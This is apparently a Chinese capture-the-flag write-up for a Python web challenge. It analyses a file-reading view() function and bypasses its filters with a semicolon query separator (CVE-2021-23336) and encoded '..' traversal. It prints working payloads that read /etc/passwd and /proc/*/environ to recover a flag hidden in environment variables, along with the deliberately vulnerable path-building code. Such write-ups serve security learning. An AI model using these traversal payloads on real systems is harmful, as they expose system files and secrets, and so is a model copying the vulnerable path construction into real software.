下载题目源码打开index.py进行分析
def view(request):
context = {}
try:
context['request'] = request
clientId = getClientID(request.client.host)
if '&' in request.url.query or '.' in request.url.query or '.' in unquote(request.query_params[clientId]):
raise
filename = request.query_params[clientId]
path = './memo/' + "".join(request.query_params.keys()) + '/' + filename
f = open(path, 'r')
contents = f.readlines()
f.close()
context['filename'] = filename
context['contents'] = contents
这题重点的地方在于path,会进行读取输出,flag在上一个目录
构造Pyload
没绕过request.query和request.queryparam,一个是用;
代替&
分隔,因为是python3.9.0服务器的缘故,存在CVE-2021-23336漏洞,详情可看这里:urllib parse_qsl(): Web cache poisoning - semicolon as a query args separator — Python Security 0.0 documentation
构造Payload
/view?id=flag;/%2e%2e/ #每个环境id都不一,根据自己情况修改
发现flag文件里没有我们需要的flag,以BUU环境的习惯,肯定是又藏在了env环境变量里了
/view?id=etc/passwd;/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/
/view?id=proc/self/environ;/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/
发现还是没有flag,尝试bp爆破PID 。(以CTF出题人的习惯)
/proc/{pid}/environ 常用来读取环境变量中的SECRET_KEY或FLAG
最终的pyload
/view?id=proc/1/environ;/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/
flag{164a7a69-230f-4cd8-8cdf-69f81dd9f674}